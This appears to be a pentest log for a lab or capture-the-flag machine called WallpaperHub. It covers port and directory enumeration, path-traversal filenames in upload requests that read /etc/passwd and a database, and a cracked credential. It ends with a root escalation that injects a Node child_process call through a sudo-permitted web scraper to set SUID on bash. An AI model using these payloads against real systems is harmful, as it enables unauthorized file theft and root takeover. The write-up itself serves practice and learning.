WallpaperHub

๐Ÿงช Pentest Log: {{date:2025-08-13}}

๐Ÿ” Target Information

ip=192.168.199.204

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Port 5000

Web Directory Scan

gobuster dir -u http://$ip:5000 -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip:5000 -r -o dirsearch.txt

The file upload does not sanitize input

-----------------------------413298617138376585991046617009
Content-Disposition: form-data; name="file"; filename="../../../../../../../etc/passwd"
Content-Type: image/png

Retrieve database.db

-----------------------------413298617138376585991046617009
Content-Disposition: form-data; name="file"; filename="../../../../../../../home/wp_hub/wallpaper_hub/databse.db"
Content-Type: image/png

View the hash inside the database.db

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

Crack the hash of the password, obtain credential

wp_hub:qazwsxedc

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

Sudo:

sudo -l

Found

User wp_hub may run the following commands on wallpaperhub:
    (root) NOPASSWD: /usr/bin/web-scraper /root/web_src_downloaded/*.html

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

echo "chmod +s /bin/bash" > /tmp/exploit
chmod +x /tmp/exploit

echo "\`<script src=\"http://localhost:1337/'+require('child_process').execSync('/tmp/exploit')+'\"></script>\`" > /tmp/exploit.html

python3 -m http.server 1337

sudo -u root /usr/bin/web-scraper /root/web_src_downloaded/../../tmp/exploit.html

bash -p